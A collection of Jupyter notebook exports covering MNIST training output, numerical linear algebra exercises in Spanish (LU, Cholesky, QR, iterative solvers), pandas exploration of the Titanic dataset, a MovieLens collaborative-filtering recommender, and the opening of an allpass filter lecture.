60000/60000 [==============================] - 4s 62us/sample - loss: 0.2645 - acc: 0.9246
Epoch 2/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.1159 - acc: 0.9669
Epoch 3/10
60000/60000 [==============================] - 4s 60us/sample - loss: 0.0802 - acc: 0.9766
Epoch 4/10
60000/60000 [==============================] - 4s 62us/sample - loss: 0.0600 - acc: 0.9819
Epoch 5/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0471 - acc: 0.9858
Epoch 6/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0367 - acc: 0.9888
Epoch 7/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0298 - acc: 0.9909
Epoch 8/10
60000/60000 [==============================] - 4s 62us/sample - loss: 0.0242 - acc: 0.9922
Epoch 9/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0189 - acc: 0.9939
Epoch 10/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0164 - acc: 0.9950
###Markdown
Testing the ModelNow that we've made a model - let's see if it works!
###Code
test_set = x_test.reshape((len(x_test), -1)) / 255.
test_loss, test_acc = model.evaluate(test_set, y_test)
print('\nTest accuracy:', test_acc)
###Output
10000/10000 [==============================] - 0s 31us/sample - loss: 0.0800 - acc: 0.9781
Test accuracy: 0.9781
|
notebook/T2.ipynb | ###Markdown
Tema 2: Sistemas de ecuaciones numéricas lineales
###Code
!pip install -r https://raw.githubusercontent.com/alexmascension/ANMI/main/requirements.txt
from sympy import *
from sympy.matrices import Matrix as mat
from sympy.matrices import randMatrix
from sympy import symbols
import sympy
import matplotlib.pyplot as plt
import numpy as np
from scipy.linalg import orth
from anmi.genericas import norma, print_verbose, norma_1, norma_inf, norma_2
from numpy.linalg import cond as numero_condicion
from anmi.T2 import descomposicion_LU, descomposicion_LDU, cholesky, gram_schmidt, householder, factorizacion_QR
from anmi.T2 import metodo_iterativo, criterio_m_matriz, criterio_SOR, criterio_simetrica_definida_positiva, criterio_diagonal_dominante, criterio_radio_espectral
###Output
_____no_output_____
###Markdown
Número de condicion El número de condición se define como $\vert\vert A \vert\vert \cdot \vert\vert A^{-1}\vert\vert$. Un número de condición cercano a 1 implica una matriz más estable frente a métodos con elementos diferenciales. Se cumple que las matrices ortogonales tienen número de condición 1.
###Code
help(numero_condicion)
M = mat(((1, 2, 3), (2, 3, 1), (3, 2, 4)))
M
numero_condicion(np.array(M).astype(int))
M_ort = (orth(np.array(M).astype(int)))
M_ort
numero_condicion(M_ort)
###Output
_____no_output_____
###Markdown
Factorización LU y LDU*Recordemos que para una matriz, la factorización LU es el proceso de aplicación de la simplificación de Gauss, de modo que la matriz $L$ es una matriz triangular inferior con los coeficientes de transformación, y la matriz $U$ es la matriz superior con los elementos tras las transformaciones lineales.Además, se puede hacer que $D$ sea una matriz diagonal con los valores de la diagonal de $U$, de modo que $LU$ = $LDD^{-1}U$, y si hacemos $U^* = D^{-1}U$ entonces tenemos $LDU^*$, donde $U^*$ sigue siendo una matriz diagonal superior, pero con la diagonal igual a 1.A la hora de aplicar la factorización LU y LDU* se puede hacer una permutación de filas, de modo que en cada iteración se coge la fila con mayor valor (de entre las que no se han *procesado*) y se permuta, garantizando una solución siempre. También, es importante tener en mente que la factorización falla si algún elemento de la diagonal (desde el principio o durante la factorización) es 0, de modo que para solucionar ese caso se aplica la permutación.Todas las permutaciones quedan recogidas en una matriz $P$, de modo que $$LU = LDU^* = PA$$
###Code
help(descomposicion_LU)
M = mat(((1, 4, 4), (3, 2, 1), (2, 4, 1)))
descomposicion_LU(M, permutar_max=False)
descomposicion_LDU(M, permutar_max=False)
descomposicion_LU(M, rhs=ones(M.shape[0], 1), permutar_max=True)
descomposicion_LDU(M, permutar_max=True)
###Output
_____no_output_____
###Markdown
Factorización de CholeskyLa factorización de Cholesky es una factorización que genera una matriz triangular inferior $L$ tal que $A = LL^T$. Para que una matriz sea factorizable, tiene que cumplir que sus menores principales sean positivos, y que sea simétrica.
###Code
help(cholesky)
M = mat(((2, -1, 0), (-1, 2, -2), (0, 2, 1)))
M
cholesky(M)
cholesky(M + M.T)
M + M.T
cholesky(M + M.T) * cholesky(M + M.T).T
# Podemos hacer también Cholesky a una matriz con símbolos!
x = symbols('x')
Mx = mat(((1, x, 1), (x, 2, 1), (1, 1, 3)))
Mx
cholesky(Mx)
###Output
_____no_output_____
###Markdown
Ortogonalización de Gram-Schmidt
###Code
help(gram_schmidt)
M
GS = gram_schmidt(M)
GS['P']
GS['Pn']
GS['c']
GS['P'][:, 1].T * GS['P'][:, 2]
Mx = mat(((1, 2, 3), (1, x, 1), (0, 0, 3)))
GSx = gram_schmidt(Mx)
GSx['P']
###Output
_____no_output_____
###Markdown
Transformación de HouseholderLa transformación de Householder es una transformación para pasar de un vertor $x$ a un vector $y$. Para ello se toma el vector $e$, que sería el eje de transformación, y la matriz aplicación es $H = I - 2ee^t$.En este caso, $$e = \pm \frac{x - y}{\vert\vert x - y \vert\vert}$$Para la transformación de Householder $x$ e $y$ **tienen que tener la misma norma**. El vector resultante $e$ tiene norma 1.
###Code
help(householder)
v0 = mat(((1, 0)))
vf = mat((1, 1))
vf = vf/norma(vf)
H, e = householder(v0, vf, normalizar=False)
H
e
# Ejercicio 10
t = symbols('t')
v0 = mat(((1, 0)))
vf = mat((cos(t), sin(t)))
H, e = householder(v0, vf, normalizar=False)
H
e
###Output
_____no_output_____
###Markdown
Factorización QRLa factorización QR consiste en transformar $A = QR$ donde $Q$ es ortogonal y $R$ es triangular superior. Si $P$ es la matriz ortogonalizada, $C$ es la matriz con los factores de ortonormalización (para Gram-Schmidt, por ejemplo, es $m_{ij} = \frac{a^j\cdot p^i}{\vert\vert p^{i}\vert\vert^2}$ y $D$ es la matriz de las normas de los vectores ortogonales ($\vert\vert p^i\vert\vert$), entonces se tiene que:$$Q = PD^{-1}$$$$R = D(I + C)$$
###Code
help(factorizacion_QR)
M = mat(((2, -1, 0), (0, 0, -2), (0, 2, -1)))
factorizacion_QR(M, metodo='householder')
A1 = mat(((2, -1, 0), (0, 0, -2), (0, 2, -1)))
A1 = mat(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
A1
dqr = factorizacion_QR(A1, metodo='householder')
dqr['Q']
dqr['R']
simplify(dqr['Q'].T * dqr['Q'])
simplify(dqr['Q'] * dqr['R'])
###Output
_____no_output_____
###Markdown
Métodos iterativos Los métodos iterativos son métodos para resolver el sistema $Ax=b$. Todos los métodos se basan en el mismo criterio, que es emplear una matriz $H$ tal que, para una iteración:$$x^{(k+1)} = Hx^{(k)} + b'$$Si tomamos la matriz $A = D - L - U$ (donde $D$ es la diagonal de $A$, y $L$ y $U$ son matrices triangulares de elementos de $A$), la ecuación anterior queda:$$Mx^{(k+1)} = (M-A)x^{(k)} + b$$Y simplemente hay que despejar para $x^{(k+1)}$ (pues $x^{(k)}$ lo conocemos) y repetir el procedimiento hasta convergencia:$$x^{(k+1)} = M^{-1}(M-A)x^{(k)} + M^{-1}b$$Según el método, la matriz difiere: para Jacobi es $M = D$, para Gauss-Seidel es $M = D-L$ y para sobre-relajación (ros) es $M = \frac{1}{\omega}D - L$.
###Code
help(metodo_iterativo)
A = mat([[2, 1, 1], [1, -2, 1], [1, 1, 2]])
b = mat([[1, 1, 1]]).T
diter = metodo_iterativo(A, b, n_iter=200, verbose=True)
np.array(diter['x'], dtype=float)
# EJERCICIO 12
a = symbols('a')
A = mat([[4, 1, a], [1, 4, 1], [a, 1, 4]])
metodo_iterativo(A, metodo='gs', n_iter=3)
# EJERCICIO 14
A = mat([[-11, 20, 8], [20, 16, -8], [8, -8, 5]]) / 27
norma_1(A)
norma_inf(A)
d = [simplify(i) for i in list((A.T * A).eigenvals().keys())]
# norma_2(A)
A
A.T * A
simplify((A.T * A - a * eye(3)))
###Output
_____no_output_____
###Markdown
Ejercicios Ejercicio 14Calcular $\vert\vert A\vert\vert_1, \vert\vert A\vert\vert_2, \vert\vert A\vert\vert_\infty$ de la matriz
###Code
A = Matrix([[-11, 20, 8], [20, 16, -8], [8, -8, 5]]) / 27
A
np.sum(abs(A), 0), norma_1(A)
np.sum(abs(A), 1), norma_inf(A)
# Para la norma_2 podemos usar norma_2(), pero vamos a hacerlo a mano. Para ello:
# 1) Hallamos A.T * A
AA = simplify(A.T * A)
AA
# En este punto los resultados difieren, así que usaremos sus resultados intermedios
AA = Matrix([[65, 4, -32], [4, 80, 8], [-32, 8, 17]]) / 81
# 2) Hallamos los autovalores
factor(det(AA - symbols('lambda') * eye(3)))
# Los autovalores son 0 y 1. Luego nos quedamos con 1
rho = max(solve(det(AA - symbols('lambda') * eye(3))))
norma_2 = sqrt(rho)
norma_2
###Output
_____no_output_____
###Markdown
Ejercicio 15La matriz de Hilbert $H_n$ tiene como coeficientes $h_{ij} = \frac{1}{i + j -1}$Determinar el límite para $\vert\vert \; \vert\vert_1$ y $\vert\vert \; \vert\vert_\infty$: $\lim_{n\to \infty}\vert\vert H_n \vert\vert$.
###Code
def Hn(n):
hn = zeros(n, n)
for row in range(n):
for col in range(n):
hn[row, col] = S(1) / S(row + col + 1) # porque i y j les sumamos 1
return hn
# Vamos a crear unas matrices de prueba
Hn(7)
###Output
_____no_output_____
###Markdown
Vemos que la matriz es simétrica, luego norma 1 y norma inf serán iguales.La columna / fila con mayor suma es la primera, pues:$A[1:, 0] = A[:-1, 1]$ y $A[0, 0] > A[-1, 1]$Y por inducción en el resto de columnas se ve que $\sum A[:, i] > \sum A[:, i+1]$. El valor para $n$ de la primera fila es $\sum A[:, 0] = \sum_i^n 1/i$, que es la serie harmónica.Para $n \to \infty$, sabemos que $\sum_i^n 1/i \to \infty$, luego $\lim_{n\to \infty}\vert\vert H_n \vert\vert = \infty$ Ejercicio 16Se considera la matriz $$ A = \begin{pmatrix}a & 1+a\\0 & a\end{pmatrix}$$con $a > 0 \in \mathbb{R}$.1) Calcular el número de condición de $A$ en la norma $\vert \vert A \vert \vert_\infty$$
###Code
# El núemro de condición es ||A||·||A^-1||
a = symbols('a')
A = Matrix([[a, 1+a], [0, a]])
A
Ainv = A.inv()
Ainv
# Norma_inf A es a + a + 1 = 1 + 2a
ninfA = 1 + 2*a
# Norma_inf Ainv es 1/a + 1/a + 1/a2 =
ninfAinv = 1/a + 1/a + 1/a**2
ninfA, ninfAinv
condicion = ninfA * ninfAinv
simplify(condicion)
simplify(1 - factor(condicion))
###Output
_____no_output_____
###Markdown
2) Estimar el error relativo de la solución del sistema lineal perturbado$$(A + \delta A)(x + \delta x) = b + \delta b$$Por el lema de Banach tenemos que $$\frac{\vert\vert \delta x\vert\vert}{\vert\vert x\vert\vert} = \frac{cond(A)}{1-cond(A)\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}}\left( \frac{\vert\vert \delta b\vert\vert}{\vert\vert b\vert\vert} + \frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}\right)$$Para este ejercicio es $$\frac{\vert\vert \delta x\vert\vert}{\vert\vert x\vert\vert} = \frac{ (2a+1)^2}{(a^2 - (2a+1)^2)\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}}\left( \frac{\vert\vert \delta b\vert\vert}{\vert\vert b\vert\vert} + \frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}\right)$$De lo cual se cumple que $$\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert} < \frac{1}{cond(A)}$$ Ejercicio 17Calcular la factorización LU de la matriz $A$ con pivote parcial con $0 < \alpha < \frac{\pi}{4}$.
###Code
a = symbols('alpha')
A = Matrix([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, cos(a), -sin(a)], [0, 0, sin(a), cos(a)]])
A
###Output
_____no_output_____
###Markdown
En este caso tenemos que la función LU nos falla porque el máximo de la matriz "no existe". Vamos a programarlo. Vamos a emplear la factorización de Doolitle del estilo $PA = LU$. En este caso, $P = P^{(1)}$
###Code
P = Matrix([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
P
dict_LU = descomposicion_LU(P * A, permutar_max=False)
dict_LU['L']
dict_LU['U']
simplify(dict_LU['L'] * dict_LU['U'])
###Output
_____no_output_____
###Markdown
Vemos que tras la primera permutación, la función funciona sin problemas. Ejercicio 18Sea $L$ la matriz con coeficientes $l_{ij} = \max\{i-j+1, 0\}$ para todo $i, j = 1, \cdots, n$. Se sabe que $L$ es triangular inferior que aparece en la factorización de Cholesky de una matriz $A$ de $n$ filas y $n$ columnas, de la que únicamente se sabe que su coeficiente $a_{n2} = 14$. Determinar la dimensión de $A$ Es decir, $a_{n2} = 14$, y $a_{ij} = \sum_{k \le \min\{i,j\}}^n l_{ik}l_{jk}$Luego $a_{n2} = l_{n1}l_{21} + l_{n2}l_{22} = (n) \cdot (2) + (n - 1) \cdot (1) = 2n + n - 1 = 3n - 1$Luego $3n - 1 = 14$ y $n = 15/3 = 5$.Por tanto, la matriz $L$ es:
###Code
L = zeros(5, 5)
for i in range(5):
for j in range(5):
ij = max(i - j + 1, 0)
L[i, j] = ij
L
###Output
_____no_output_____
###Markdown
Y $A$ es
###Code
A = L * L.T
A
###Output
_____no_output_____
###Markdown
Y se ve que $a_{52} = a_{n2} = 14$ Ejercicio 19 Determinar en que rango los valores de $\alpha$ de la matriz $A$ es invertible y admite una factorización de Cholesky.
###Code
a = Symbol('alpha')
A = Matrix([[2, 1, a], [1, 2, 1], [a, 1, 2]])
A
###Output
_____no_output_____
###Markdown
La matriz es invertible en aquellos casos donde su determinante no sea nulo.
###Code
factor(det(A))
###Output
_____no_output_____
###Markdown
Vemos que las soluciones son $\alpha = 2$ y $\alpha = -1$. En esos casos la matriz no es invertible. Además, existe una factorización de Cholesky para los casos en los que $\det(A) > 0$, que se cuple cuando $1 < \alpha < 2$. En esos casos la factorización es
###Code
cholesky(A)
###Output
_____no_output_____
###Markdown
Ejercicio 20 Determinar la factorización de Cholesky de $A_{n\times n}$ con coeficientes. $$a_{11} = 1$$$$a_{ii} = 1 + i^2$$$$a_{i, i+1} = a_{i+1, i} = -i$$Calcular el determinante de $A$ Vamos a sacar algunos ejemplos ilustrativos para hacernos una idea.
###Code
n = 7
A = zeros(n, n)
for i in range(n):
for j in range(n):
if i == j:
A[i,j] = (i+1) ** 2 + 1
elif i == (1 + j):
A[i,j] = -i
elif j == (1 + i):
A[i,j] = -j
else:
pass
A[0, 0] = 1
A
cholesky(A)
###Output
_____no_output_____
###Markdown
Así a primera vista vemos el patrón evidente. Vamos a demostrarlo.Sabemos que $l_{11} = 1$ y $l_{21} = -1$Vamos a probar un par de casos.Para $i = 2$ tenemos que$$l_{22} = \sqrt{a_{22} - l_{21}^2} = \sqrt{1 + 2^2 - (-1)^2} = 2$$$$l_{32} = \frac{a_{32} - \sum_k^1l_{3k}l_{2k}}{l_{22}} = \frac{-2 - (-1)(0)}{2} = -1$$Y $l_{31} = 0$Para $i=3$ tenemos$$l_{33} = \sqrt{a_{33} - \sum_{k=1}^{2}l_{3k}^2} = \sqrt{1 + 3^2 - l_{32}^2} = \sqrt{1 + 3^2 - (-1)^2} = 3$$$$l_{43} = \frac{-3 - l_{42}l_{32}}{l_{33}} = \frac{-3 - (-1)(0)}{3} = -1$$Y, por inducción:$$l_{ii} = \sqrt{a_{ii} - l_{i, i-1}^2} = \sqrt{1 + i^2 - 1} = i$$$$l_{i+1, i} = \frac{a_{i+1,i}}{l_ii} = \frac{-i}{i} = -1$$ Luego la matriz es de la forma:$\det{A} = \det({L})\det({L^T}) = \det({L})^2 = (n!)^2$ Ejercicio 21 Construir una trnaformación de Householder que transforme el vector $x = (\cos\alpha, -\sin\alpha, 1, 1)^t$ en el vector $y = (1, 1, \sin\alpha, \cos\alpha)^t.Encontrar la matriz asociada a esta transformación para $\alpha = \pi/2$
###Code
vx = Matrix([cos(a), -sin(a), 1, 1])
vy = Matrix([1, 1, sin(a), cos(a)])
vx
H, e = householder(vx, vy, normalizar=True)
simplify(H)
simplify(e)
H.subs(a, pi/2)
###Output
_____no_output_____
###Markdown
Ejercicio 22 Sean $A$ y $b$. Aplicar el método de Gram-Schmidt para ortonormalizar el conjunto de vectores $\{b, Ab, A^2b\}$.
###Code
A = Matrix([[1, 2, 0], [2, 1, 2], [0, 2, 1]])
b = Matrix([1, -1, 1])
T = zeros(3, 3)
T[:, 0] = b
T[:, 1] = A * b
T[:, 2] = A ** 2 * b
T
GS = gram_schmidt(T)
GS['P']
GS['Pn']
###Output
_____no_output_____
###Markdown
Ejercicio 23 Se considera el sistem lineal $Ax=b$. Hallar el valor de $\beta$ que minimice el radio espectral de $I - \beta A$
###Code
A = Matrix([[1, 1, 2], [0, 2, -1], [0, -1, 2]])
b = Matrix([1, 1, 1])
beta = Symbol('beta')
###Output
_____no_output_____
###Markdown
Primero vamos a hallar el radio espectral de la matriz $I - \beta A$
###Code
iba = eye(3) - beta * A
iba
l = Symbol('lambda')
eq = factor(det(iba - eye(3) * l))
eq
###Output
_____no_output_____
###Markdown
Vemos que los autovalores de $I - \beta A$ son $\lambda = 1 - \beta$ y $\lambda = 1 - 3\beta$
###Code
x = np.linspace(-1, 1, 100)
plt.plot(x, [max(abs(1-i), abs(1-3*i)) for i in x])
###Output
_____no_output_____
###Markdown
Vemos que el menor valor está en $\beta = 0.5$ donde $\rho(I - \beta A) = 0.5$ Ejercicio 24 Se considera el sistema lineal $$x_{i+1} = x_i + x_{i-1} \;\;\; i = 1, 2, 3$$$$x_0 = 1, x_4 = 5$$Es decir:$$\begin{align}x_2 & = x_1 + x_0\\x_3 & = x_2 + x_1\\x_4 & = x_3 + x_2\\\end{align}$$Resolviendo parámetros$$\begin{align}x_2 & = x_1 + 1\\x_3 & = x_2 + x_1\\5 & = x_3 + x_2\\\end{align}$$Analizar la convergencia del método de jacobi cuando se aplica a la resolución de este sistema de ecuaciones. El sistema de ecuaciones se puede reordenar de la siguiente manera:$$\begin{align}-x_1 + x_2 + 0 \cdot x_3 & = 1\\-x_1 - x_2 + x_3 & = 0\\0\cdot x_1 - x_2 - x_3 & = 5\\\end{align}$$Que, simplificando signos, queda:$$\begin{align}-x_1 + x_2 + 0 & = 1\\x_1 + x_2 - x_3 & = 0\\0 + x_2 + x_3 & = -5\\\end{align}$$En sistema matricial queda como$$\begin{pmatrix}-1 & 1 & 0 \\1 & 1 & -1 \\0 & 1 & 1 \\\end{pmatrix}\begin{pmatrix}x_1\\x_2\\x_3\end{pmatrix} = \begin{pmatrix}1 \\ 0 \\ -5\end{pmatrix}$$
###Code
A = Matrix([[-1, 1, 0], [1, 1, -1], [0, 1, 1]])
D = Matrix([[-1, 0, 0], [0, 1, 0], [0, 0, 1]])
b = Matrix([1, 0, -5])
help(metodo_iterativo)
metodo_iterativo(A=A, b=b, metodo='jacobi')
###Output
_____no_output_____
###Markdown
Por el criterio del radio espectral, tenemos que los autovalores son $\pm\sqrt{2}i$, y el radio espectral es $\sqrt{2} > 1$, luego el método de Jacobi no converge.De hecho vemos que la matriz de diferencias crece con cada iteración. Ejercicio 25 Analizar la convergencia de los métodos de Jacobi, Gauss-Seidel y SOR cuando se aplica el sistema lineal$$\begin{pmatrix}4 & 1 & 0 & \cdots & 0 & 0 & 0 \\1 & 4 & 1 & \cdots & 0 & 0 & 0 \\0 & 1 & 4 & \cdots & 0 & 0 & 0 \\\vdots & \vdots & \vdots & \ddots & \vdots & \vdots & \vdots \\0 & 0 & 0 & \cdots & 4 & 1 & 0 \\0 & 0 & 0 & \cdots & 1 & 4 & 1 \\0 & 0 & 0 & \cdots & 0 & 1 & 4 \\\end{pmatrix}\begin{pmatrix}x_1\\x_2\\x_3\\\vdots\\x_{n-2}\\x_{n-1}\\x_n\end{pmatrix}=\begin{pmatrix}1\\2\\3\\\vdots\\n-2\\n-1\\n\end{pmatrix}$$
###Code
n = 8
A = eye(n) * 4
b = ones(n, 1)
for i in range(n-1):
A[i+1, i], A[i, i+1], b[i+1, 0] = 1, 1, i+2
A
b
dict_jac = metodo_iterativo(A=A, b=b, metodo='jacobi')
N(dict_jac['x']), N(Matrix(dict_jac['diff']))
dict_gs = metodo_iterativo(A=A, b=b, metodo='gs')
N(dict_gs['x']), N(Matrix(dict_gs['diff']))
dict_sor = metodo_iterativo(A=A, b=b, metodo='sor')
N(dict_sor['x']), N(Matrix(dict_sor['diff']))
###Output
_____no_output_____
###Markdown
Vemos que las matrices son convergentes, y los criterios inmediatos de convergencia se justifican. Vamos a estudiar cada uno de ellos en detalle. **Criterio de radio espectral**: vemos que hay autovalores mayores que 1, así que no podemos asegurar la convergecia del sistema por este criterio.
###Code
solve(factor(det(A - eye(n) * l)), l)
###Output
_____no_output_____ |
GuideToPandas.ipynb | ###Markdown
Data Exploration with Pandas
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
df = pd.read_csv('../data/titanic-train.csv')
df.head()
df.describe()
df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 891 entries, 0 to 890
Data columns (total 12 columns):
PassengerId 891 non-null int64
Survived 891 non-null int64
Pclass 891 non-null int64
Name 891 non-null object
Sex 891 non-null object
Age 714 non-null float64
SibSp 891 non-null int64
Parch 891 non-null int64
Ticket 891 non-null object
Fare 891 non-null float64
Cabin 204 non-null object
Embarked 889 non-null object
dtypes: float64(2), int64(5), object(5)
memory usage: 83.6+ KB
###Markdown
Indexing
###Code
df.iloc[2]
df.iloc[0:5:2]
df[["Sex","Embarked"]].head()
###Output
_____no_output_____
###Markdown
Conditioning inside df with pandas
###Code
df["Age"].head() > 30
df[df['Age']>0].head()
df[(df['Age']> 30) & (df['Sex'] == 'male')].describe()
###Output
_____no_output_____
###Markdown
we can also use .querry for running conditional Unique values
###Code
df.head()
df["Pclass"].unique()
df["Name"].head()
###Output
_____no_output_____
###Markdown
Sorting of the values
###Code
df.sort_values('Age',axis = 0,ascending = False).head()
# Barkworth, Mr. Algernon Henry Wilson is oldest person on that ship that day
df[(df["Age"] >79)][["Age","Sex"]]
###Output
_____no_output_____
###Markdown
Exercisehow many null values in cabin?
###Code
df["Cabin"].isnull().count()
###Output
_____no_output_____ |
python/recommender/movie_recom_2.ipynb | ###Markdown
BUILDING A RECOMMENDER SYSTEM ON USER-USER COLLABORATIVE FILTERING (MOVIELENS DATASET)We will load the data sets firsts.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
#column headers for the dataset
data_cols = ['user id','movie id','rating','timestamp']
item_cols = ['movie id','movie title','release date','video release date','IMDb URL','unknown','Action',
'Adventure','Animation','Childrens','Comedy','Crime','Documentary','Drama','Fantasy','Film-Noir','Horror',
'Musical','Mystery','Romance ','Sci-Fi','Thriller','War' ,'Western']
user_cols = ['user id','age','gender','occupation','zip code']
#importing the data files onto dataframes
users = pd.read_csv('ml-100k/u.user', sep='|', names=user_cols, encoding='latin-1')
item = pd.read_csv('ml-100k/u.item', sep='|', names=item_cols, encoding='latin-1')
data = pd.read_csv('ml-100k/u.data', sep='\t', names=data_cols, encoding='latin-1')
###Output
_____no_output_____
###Markdown
We will use the file u.data first as it contains User ID, Movie IDs and Ratings. These three elements are all we need for determining the similarity of the users based on their ratings for a particular movie. I will first sort the DataFrame by User ID and then we are going to split the data-set into a training set and a test set (I just need one user for the training).
###Code
utrain = (data.sort_values('user id'))[:99832]
print(utrain.tail())
utest = (data.sort_values('user id'))[99833:]
print(utest.head())
###Output
user id movie id rating timestamp
91841 943 132 3 888639093
91810 943 204 3 888639117
77956 943 94 4 888639929
87415 943 53 3 888640067
77609 943 124 3 875501995
###Markdown
We convert them to a NumPy Array for ease of iteration!
###Code
utrain = utrain.as_matrix(columns = ['user id', 'movie id', 'rating'])
utest = utest.as_matrix(columns = ['user id', 'movie id', 'rating'])
###Output
_____no_output_____
###Markdown
Create a users_list which is a list of users that contains a list of movies rated by him. This part is going to greatly compromise on the program time unfortunately!
###Code
users_list = []
for i in range(1,943):
list = []
for j in range(0,len(utrain)):
if utrain[j][0] == i:
list.append(utrain[j])
else:
break
utrain = utrain[j:]
users_list.append(list)
###Output
_____no_output_____
###Markdown
Define a Function by the Name of EucledianScore. The purpose of the EucledianScore is to measure the similarity between two users based on their ratings given to movies that they have both in common. But what if the users have just one movie in common? In my opinion having more movies in common is a great sign of similarity. So if users have less than 4 movies in common then we assign them a high EucledianScore.
###Code
def EucledianScore(train_user, test_user):
sum = 0
count = 0
for i in test_user:
score = 0
for j in train_user:
if(int(i[1]) == int(j[1])):
score= ((float(i[2])-float(j[2]))*(float(i[2])-float(j[2])))
count= count + 1
sum = sum + score
if(count<4):
sum = 1000000
return(math.sqrt(sum))
###Output
_____no_output_____
###Markdown
Now we will iterate over users_list and find the similarity of the users to the test_user by means of this function and append the EucledianScore along with the User ID to a separate list score_list. We then convert it first to a DataFrame, sort it by the EucledianScore and finally convert it to a NumPy Array score_matrix for the ease of iteration.
###Code
score_list = []
for i in range(0,942):
score_list.append([i+1,EucledianScore(users_list[i], utest)])
score = pd.DataFrame(score_list, columns = ['user id','Eucledian Score'])
score = score.sort_values(by = 'Eucledian Score')
print(score)
score_matrix = score.as_matrix()
###Output
user id Eucledian Score
309 310 1.732051
138 139 3.872983
45 46 4.000000
208 209 4.242641
557 558 4.582576
724 725 4.690416
305 306 5.000000
241 242 5.000000
676 677 5.099020
265 266 5.196152
303 304 5.656854
753 754 5.744563
3 4 5.830952
798 799 6.000000
375 376 6.164414
796 797 6.244998
28 29 6.403124
799 800 6.557439
463 464 6.633250
515 516 6.708204
227 228 6.928203
438 439 7.000000
743 744 7.348469
580 581 7.416198
648 649 7.483315
203 204 7.483315
894 895 7.745967
875 876 7.810250
364 365 8.000000
52 53 8.000000
.. ... ...
650 651 1000.000000
651 652 1000.000000
655 656 1000.000000
148 149 1000.000000
661 662 1000.000000
146 147 1000.000000
145 146 1000.000000
672 673 1000.000000
142 143 1000.000000
674 675 1000.000000
280 281 1000.000000
281 282 1000.000000
139 140 1000.000000
680 681 1000.000000
133 134 1000.000000
283 284 1000.000000
684 685 1000.000000
686 687 1000.000000
687 688 1000.000000
132 133 1000.000000
128 129 1000.000000
125 126 1000.000000
383 384 1000.000000
712 713 1000.000000
111 112 1000.000000
110 111 1000.000000
719 720 1000.000000
106 107 1000.000000
104 105 1000.000000
694 695 1000.000000
[942 rows x 2 columns]
###Markdown
Now we see that the user with ID 310 has the lowest Eucledian score and hence the highest similarity. So now we need to obtain the list of movies that are not common between the two users. Make two lists. Get the full list of movies which are there on USER_ID 310. And then the list of common movies. Convert these lists into sets and get the list of movies to be recommended.
###Code
user= int(score_matrix[0][0])
common_list = []
full_list = []
for i in utest:
for j in users_list[user-1]:
if(int(i[1])== int(j[1])):
common_list.append(int(j[1]))
full_list.append(j[1])
common_list = set(common_list)
full_list = set(full_list)
recommendation = full_list.difference(common_list)
###Output
_____no_output_____
###Markdown
Now we need to create a compiled list of the movies along with their mean ratings. Merge the item and data files.Then groupby movie titles, select the columns you need and then find the mean ratings of each movie. Then express the dataframe as a NumPy Array.
###Code
item_list = (((pd.merge(item,data).sort_values(by = 'movie id')).groupby('movie title')))['movie id', 'movie title', 'rating']
item_list = item_list.mean()
item_list['movie title'] = item_list.index
item_list = item_list.as_matrix()
###Output
_____no_output_____
###Markdown
Now we find the movies on item_list by IDs from recommendation. Then append them to a separate list.
###Code
recommendation_list = []
for i in recommendation:
recommendation_list.append(item_list[i-1])
recommendation = (pd.DataFrame(recommendation_list,columns = ['movie id','mean rating' ,'movie title'])).sort_values(by = 'mean rating', ascending = False)
print(recommendation[['mean rating','movie title']])
###Output
mean rating movie title
9 4.292929 Citizen Kane (1941)
8 4.125000 A Chef in Love (1996)
15 4.000000 Butcher Boy, The (1998)
6 3.930514 Indiana Jones and the Last Crusade (1989)
4 3.839050 Chasing Amy (1997)
3 3.792899 In the Line of Fire (1993)
10 3.648352 Casino (1995)
12 3.600000 Murder in the First (1995)
5 3.545455 Stalker (1979)
14 3.166667 Flower of My Secret, The (Flor de mi secreto, ...
11 3.105263 Bad Boys (1995)
16 2.802632 Brady Bunch Movie, The (1995)
0 2.750000 Ladybird Ladybird (1994)
13 2.720930 Pete's Dragon (1977)
2 2.413793 Canadian Bacon (1994)
7 2.285714 Last Time I Committed Suicide, The (1997)
1 2.000000 Calendar Girl (1993)
|
ADSP_09_AllPassFilters.ipynb | ###Markdown
Prof. Dr. -Ing. Gerald Schuller Jupyter Notebook: Renato Profeta Allpass Filters
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/sLY2mSAPh6M" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
So far we specified the magnitude of our frequency response and didn't care much about the phase. For allpass filters, it is basically the other way around.In the beginning of filter design, we saw that we can write a transfer function as:$$\largeH(e^{j\Omega})=e^{j\phi\Omega}\cdot A(e^{j \Omega})$$Here we specify, or rather, alter the phase, and keep the the magnitude of our frequency response at constant 1, meaning$$A(e^{j\Omega})=1 $$Hence we would like to have a filter with transfer function H of magnitude constant 1,$$\mid H(e^{j\Omega})\mid=1$$This also means: The magnitude of our z-trnasform is **1 on the unit circle in complex z-plane!**
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/sR4_P72QMAk" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
Allpass Filter as Fractional Delay
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/_u5IfMjc3aQ" frameborder="0" allow="accelerometer;encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
